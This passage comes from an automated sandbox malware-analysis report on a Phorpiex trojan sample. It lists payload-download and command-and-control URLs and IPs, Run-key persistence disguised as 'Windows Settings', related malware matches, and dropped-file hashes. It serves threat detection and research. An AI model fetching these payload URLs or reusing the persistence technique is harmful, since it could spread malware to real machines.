http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user	135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.141/2s	135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://twizt.net/peinstall.php5%z	957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://twizt.net/newtpp.z%	957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://193.233.132.177/5R	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.141/1p3	135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.66/	135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.141/40	135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://twizt.net/peinstall.phpb	957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	false	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.141/4%	135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.233.132.177/1Z	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.141/6L2	135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://twizt.net/peinstall.phpshqos.dll.muiS9	957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://91.20	135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://twizt.net/newtpp.exeP0S	957C4XK6Lt.exe, 00000000.00000000.2068632504.0000000000532000.00000002.00000001.01000000.00000003.sdmp, 957C4XK6Lt.exe, 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
http://91.202.233.141/3rosoft	135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.66/1~	135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	newtpp[1].exe.0.dr	false		high
http://twizt.net/peinstall.phpm%	957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://193.233.132.177/	135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://193.233.132.177/6	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.202.233.141/2W3C	135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.233.132.177/5	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.233.132.177/2	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.233.132.177/1	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.141/4z	135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.233.132.177/4	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.233.132.177/3	135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://twizt.net/peinstall.php%temp%%s	957C4XK6Lt.exe	false	Avira URL Cloud: malware	unknown
http://91.202.233.141/5O	135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.141/6ZF	135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.233.132.177/5h.dll	135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.141/6-3	135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://twizt.net/newtpp.exeP0	957C4XK6Lt.exe	false	Avira URL Cloud: malware	unknown
http://twizt.net/peinstall.phpystem32	957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://twizt.net/=	957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
89.236.226.70	unknown	Uzbekistan	34718	TPSUZ-ASUZ	true
91.202.233.141	unknown	Russian Federation	9009	M247GB	false
82.114.186.50	unknown	Yemen	30873	PTC-YEMENNETYE	true
95.107.12.43	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
2.190.224.61	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	true
156.212.34.122	unknown	Egypt	8452	TE-ASTE-ASEG	false
134.35.173.140	unknown	Yemen	30873	PTC-YEMENNETYE	true
181.114.188.143	unknown	Bolivia	27839	ComtecoLtdaBO	true
82.194.11.2	unknown	Azerbaijan	29584	AZEDUNET-ASAZ	true
195.158.15.3	unknown	Uzbekistan	8193	BRM-ASUZ	false
189.158.148.85	unknown	Mexico	8151	UninetSAdeCVMX	true
92.46.174.254	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
134.35.74.170	unknown	Yemen	30873	PTC-YEMENNETYE	true
85.113.19.18	unknown	Kyrgyzstan	12997	KTNETKG	true
46.35.86.48	unknown	Yemen	30873	PTC-YEMENNETYE	true
109.72.204.86	unknown	Iran (ISLAMIC Republic Of)	51554	POGCIR	false
5.200.190.214	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
5.63.93.62	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
5.233.222.244	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
5.200.152.6	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
128.65.176.18	unknown	Iran (ISLAMIC Republic Of)	43754	ASIATECHIR	true
212.112.112.84	unknown	Kyrgyzstan	12764	AKNET-ASKG	true
31.186.49.163	unknown	Kyrgyzstan	12764	AKNET-ASKG	true
120.237.99.181	unknown	China	56040	CMNET-GUANGDONG-APChinaMobilecommunicationscorporation	true
5.232.84.160	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
95.156.103.50	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
105.109.202.176	unknown	Algeria	36947	ALGTEL-ASDZ	false
185.215.113.66	twizt.net	Portugal	206894	WHOLESALECONNECTIONSNL	false
134.35.185.171	unknown	Yemen	30873	PTC-YEMENNETYE	false
213.230.90.222	unknown	Uzbekistan	8193	BRM-ASUZ	false
5.251.56.144	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
95.71.69.217	unknown	Russian Federation	12389	ROSTELECOM-ASRU	true
89.218.235.182	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
193.233.132.177	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
189.190.10.16	unknown	Mexico	8151	UninetSAdeCVMX	false
36.20.68.95	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	true
37.20.161.137	unknown	Russian Federation	12389	ROSTELECOM-ASRU	true
89.219.115.32	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	true
84.53.244.106	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
41.102.227.47	unknown	Algeria	36947	ALGTEL-ASDZ	true
151.233.73.168	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
186.94.185.219	unknown	Venezuela	8048	CANTVServiciosVenezuelaVE	true
2.185.146.181	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
95.58.18.206	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
134.35.163.241	unknown	Yemen	30873	PTC-YEMENNETYE	true
197.148.34.173	unknown	Angola	36907	TVCaboAngolaAO	true
195.181.62.5	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
217.20.222.188	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	true
91.234.219.185	unknown	Uzbekistan	57764	IMAGETV-ASUZ	true
109.122.77.179	unknown	Serbia	41937	RADIJUSVEKTOR-ASRS	false
39.53.75.107	unknown	Pakistan	45595	PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK	true
31.186.54.5	unknown	Kyrgyzstan	12764	AKNET-ASKG	true
92.47.124.54	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
134.35.81.188	unknown	Yemen	30873	PTC-YEMENNETYE	true
185.177.0.227	unknown	Tajikistan	51346	TOJIKTELECOM-ASRU	false
2.191.221.216	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	true
94.141.69.176	unknown	Uzbekistan	47452	IMAX-AS-UpstreamUztelecom-UZ	false
2.180.157.70	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
151.233.21.215	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430850
Start date and time:	2024-04-24 10:06:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	957C4XK6Lt.exe renamed because original name is a hash value
Original Sample Name:	f33c75710d0e0463a2528e619c2ee382.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/7@1/60
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 53 Number of non-executed functions: 148
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.72.235.82
Excluded domains from analysis (whitelisted): client.wns.windows.com, redir.update.msft.com.trafficmanager.net, ocsp.digicert.com, slscr.update.microsoft.com, www.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:07:05	API Interceptor	2379091x Sleep call for process: 135143440.exe modified
10:07:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Users\user\sysvratrel.exe
10:07:13	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysvratrel.exe
10:07:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Users\user\sysvratrel.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
134.35.74.170	file.exe	Get hash	malicious	Phorpiex	Browse
239.255.255.250	http://stake.libertariancounterpoint.com	Get hash	malicious	Unknown	Browse
	http://awhauchoa.net	Get hash	malicious	Unknown	Browse
	https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.php	Get hash	malicious	Unknown	Browse
	load_startup.txt.ps1	Get hash	malicious	Unknown	Browse
	https://220420241.blob.core.windows.net/web/index.html?id=999	Get hash	malicious	Unknown	Browse
	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D	Get hash	malicious	HTMLPhisher	Browse
	#U5c97#U4f4d#U8865#U52a9#U5236#U5ea6.docx.doc	Get hash	malicious	Unknown	Browse
	#U5c97#U4f4d#U8865#U52a9#U5236#U5ea6.docx.doc	Get hash	malicious	Unknown	Browse
	https://tibusiness.cl/css/causarol.rar	Get hash	malicious	Unknown	Browse
	http://damarltda.cl/certificado.php	Get hash	malicious	Unknown	Browse
212.112.112.84	mKVBAPvSpM.exe	Get hash	malicious	Phorpiex	Browse
31.186.49.163	GXKDh1UKH7.exe	Get hash	malicious	Phorpiex	Browse
	file.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	cJImjP5UD3.exe	Get hash	malicious	Phorpiex	Browse
91.202.233.141	SecuriteInfo.com.Trojan.Siggen21.19151.20597.8736.exe	Get hash	malicious	Phorpiex	Browse
5.232.84.160	file.exe	Get hash	malicious	Phorpiex	Browse
2.190.224.61	file.exe	Get hash	malicious	Phorpiex	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
twizt.net	spl.exe	Get hash	malicious	Unknown	Browse	185.215.113.66
	spl.exe	Get hash	malicious	Unknown	Browse	185.215.113.66
	http://twizt.net/spl.exe	Get hash	malicious	Unknown	Browse	185.215.113.66
	http://twizt.net/spl.exe	Get hash	malicious	Unknown	Browse	185.215.113.66
	XnUEBMnOEd.exe	Get hash	malicious	Unknown	Browse	185.215.113.66
	XnUEBMnOEd.exe	Get hash	malicious	Unknown	Browse	185.215.113.66
	Document.doc.lnk	Get hash	malicious	MalLnk	Browse	185.215.113.66
	Document.doc.lnk	Get hash	malicious	MalLnk	Browse	185.215.113.66
	SecuriteInfo.com.Trojan.Siggen21.19151.20597.8736.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	Document_45.doc.lnk	Get hash	malicious	Unknown	Browse	185.215.113.84

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TPSUZ-ASUZ	file.exe	Get hash	malicious	Phorpiex	Browse	89.236.196.245
	28SY8i9x72.elf	Get hash	malicious	Mirai	Browse	89.236.193.113
	ajNjvSIXbo.elf	Get hash	malicious	Mirai	Browse	89.236.193.105
	SecuriteInfo.com.Trojan.Siggen21.19151.20597.8736.exe	Get hash	malicious	Phorpiex	Browse	185.248.44.169
	3X3LctXa5d.elf	Get hash	malicious	Mirai	Browse	62.209.149.254
	file.exe	Get hash	malicious	Phorpiex	Browse	89.236.196.245
	E-IMZO-v4.47.exe	Get hash	malicious	Unknown	Browse	89.236.209.82
	arm7.elf	Get hash	malicious	Mirai	Browse	89.236.243.97
	http://tzmk.uz/sitemapn/cs.php/?email=test.test@test.com	Get hash	malicious	Unknown	Browse	62.209.128.119
	SkWiEfUqbv.elf	Get hash	malicious	Mirai	Browse	89.236.193.134
ROSTELECOM-ASRU	oVOImRIAaz.elf	Get hash	malicious	Mirai	Browse	77.45.235.104
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	92.125.247.231
	SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	178.186.239.149
	SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	92.101.99.205
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	94.245.135.156
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	90.188.245.175
	jdsfl.arm.elf	Get hash	malicious	Mirai	Browse	176.50.124.141
	lS9yzwGRef.elf	Get hash	malicious	Mirai	Browse	37.21.254.89
	tajma.arm7-20240422-0539.elf	Get hash	malicious	Mirai, Okiru	Browse	83.171.119.82
	ATNSgLSNbG.elf	Get hash	malicious	Mirai, Okiru	Browse	212.57.149.168
PTC-YEMENNETYE	Y98pGn3FUt.elf	Get hash	malicious	Mirai	Browse	178.130.111.149
	file.exe	Get hash	malicious	Phorpiex	Browse	188.209.233.107
	2JJ6n8A6uD.elf	Get hash	malicious	Mirai	Browse	188.209.255.198
	begi6epHVb.elf	Get hash	malicious	Mirai	Browse	46.161.243.5
	Hp6E4bYV60.elf	Get hash	malicious	Mirai	Browse	178.130.92.42
	Irsa chemical co.jpg.exe	Get hash	malicious	Unknown	Browse	89.189.94.234
	Irsa chemical co.jpg.exe	Get hash	malicious	Unknown	Browse	89.189.94.234
	Swift copy of payment t.exe	Get hash	malicious	Remcos	Browse	89.189.94.234
	SzlNt8DaPj.elf	Get hash	malicious	Unknown	Browse	82.114.177.73
	SecuriteInfo.com.Variant.Lazy.481550.28669.21095.exe	Get hash	malicious	Xmrig	Browse	94.26.236.148
M247GB	sora.x86.elf	Get hash	malicious	Mirai	Browse	38.206.71.22
	pJNcZyhUh8.elf	Get hash	malicious	Mirai	Browse	38.202.225.74
	z1PROOFOFPAYMENT.exe	Get hash	malicious	Remcos	Browse	89.249.73.162
	3m7cmtctck.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	185.221.198.248
	g2PqnVy6cQ.elf	Get hash	malicious	Mirai, Okiru	Browse	193.43.20.21
	w2wnAQTd6O.elf	Get hash	malicious	Unknown	Browse	38.203.241.137
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse	194.187.251.115
	GBdBwlllKF.exe	Get hash	malicious	Amadey	Browse	91.202.233.180
	6VXQ3TUNZo.elf	Get hash	malicious	Mirai	Browse	38.202.249.37
	wFtZih4nN9.elf	Get hash	malicious	Mirai	Browse	38.203.241.144

Process:	C:\Users\user\AppData\Local\Temp\135143440.exe
File Type:	data
Category:	dropped
Size (bytes):	86272
Entropy (8bit):	7.997935698155853
Encrypted:	true
SSDEEP:	1536:p4eQqXPFgVoNd1v/NBIrgjVe+yIMY41v5SeCXQslpJ1nj0wZ1UfBRoh34sWJNUdR:y95AZVqrghPyIfaC3lBgwZ1UfBRohItA
MD5:	89C0C137E9EEE59DC9291038EEE50B4F
SHA1:	7247E7C45B16EB1289857208DE596B4854385077
SHA-256:	3C692532B72C68C1CD92374FC28B54AFD0B27DB1EABD7785C6A0E5B1E92B59C9
SHA-512:	58333E58F1E1F360FDB6D3E7DC96FA2B2FFF705CF5D7F0C51A732F83904D39C09DCA0B2EBA94CF752BB8FAD2B1750BACA3554AF6D022D6CC2B51EBCA11E05AF2
Malicious:	false
Reputation:	low
Preview:	.J..M...%.O;h...b..>.q\|....d1.8.........y...z.....!.i..s~...........#..8I.wr..K`{........V#....s...k.?...!>.:.......[....tUz.T.]<..nigk?u...!.j...P....".<S.B....NxD....\|V...(D.b........D..!##.g...4C_......e./....qPz=S.U.w...B....3.D.k.......S..R..c?......=.B...D...w.k../...L..r.1..{s.....J.g...H.R4.Y.0X..$i..J3...v.b......9..m..w.....bo......e..zn...U.b.V.,a`R.:..7.@.ot.;..Gzt_L....Cs.k....jJ...h...;n.)..].H">.r7X.J..?...y...5..Z.'...JK.. d...&e..C..&..../....Z..e~.....,9Q..H=8..Eb.jc..m.g.A..T{..+.z..R.3...Z5.o.B..l..+C....K.....7W."..C..$...o._....iXd..0.dw9.....DY>#.u.....nP.r....!.QW.."...J2..c=...q~...!~v....p..vhL..I!..._h../..T.G..dCfVg...~./..w)...C_8.!X.8+{H@w....J...s.H$.B8y...l.5f..T!.~...qM.b. \|A..b..o............i.....@..R....C5.1.4F.{....3.fnp.f....,O./....(.upu..6......Pm..FtOe4.@i..4.iM.VM.."J.....`w.Q......Ls..d..d.H.O2".z.C.m..h7.)h.,....z...s..5...4...:.Z.............!.U...2..;}.`........I..y....2...&.`.h[....~W

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe

Download File

Process:	C:\Users\user\Desktop\957C4XK6Lt.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	6.395549483776685
Encrypted:	false
SSDEEP:	1536:gEKh/S0Fmav8242worjs0nGxMvrEl3/AEHK:bKlWOpsG8MviYEHK
MD5:	36010B83BCCFCD1032971DF9FC5082A1
SHA1:	9967B83065E3AD82CD6C0C3B02CF08AB707FDE3E
SHA-256:	99C140F3DBD18B65457BC398730516F3A8C1D0E5BA68AA46C194505BF0F12A98
SHA-512:	C8008923315D86C06B57E47D9BF81CEC47CDA0DEC6D9F8AA57D7B4C57C7138997486A6F60EB0015BC99755AFEB3D943BC8D9BA83DBB8C9219FA4990296DE1DEF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....%(f.....................x.......t............@..........................................................................'.......................................................................................... ............................text...Z........................... ..`.rdata...7.......8..................@..@.data...@?...@......."..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\135143440.exe

Download File

Process:	C:\Users\user\Desktop\957C4XK6Lt.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	6.395549483776685
Encrypted:	false
SSDEEP:	1536:gEKh/S0Fmav8242worjs0nGxMvrEl3/AEHK:bKlWOpsG8MviYEHK
MD5:	36010B83BCCFCD1032971DF9FC5082A1
SHA1:	9967B83065E3AD82CD6C0C3B02CF08AB707FDE3E
SHA-256:	99C140F3DBD18B65457BC398730516F3A8C1D0E5BA68AA46C194505BF0F12A98
SHA-512:	C8008923315D86C06B57E47D9BF81CEC47CDA0DEC6D9F8AA57D7B4C57C7138997486A6F60EB0015BC99755AFEB3D943BC8D9BA83DBB8C9219FA4990296DE1DEF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\135143440.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....%(f.....................x.......t............@..........................................................................'.......................................................................................... ............................text...Z........................... ..`.rdata...7.......8..................@..@.data...@?...@......."..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1682018248.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\135143440.exe
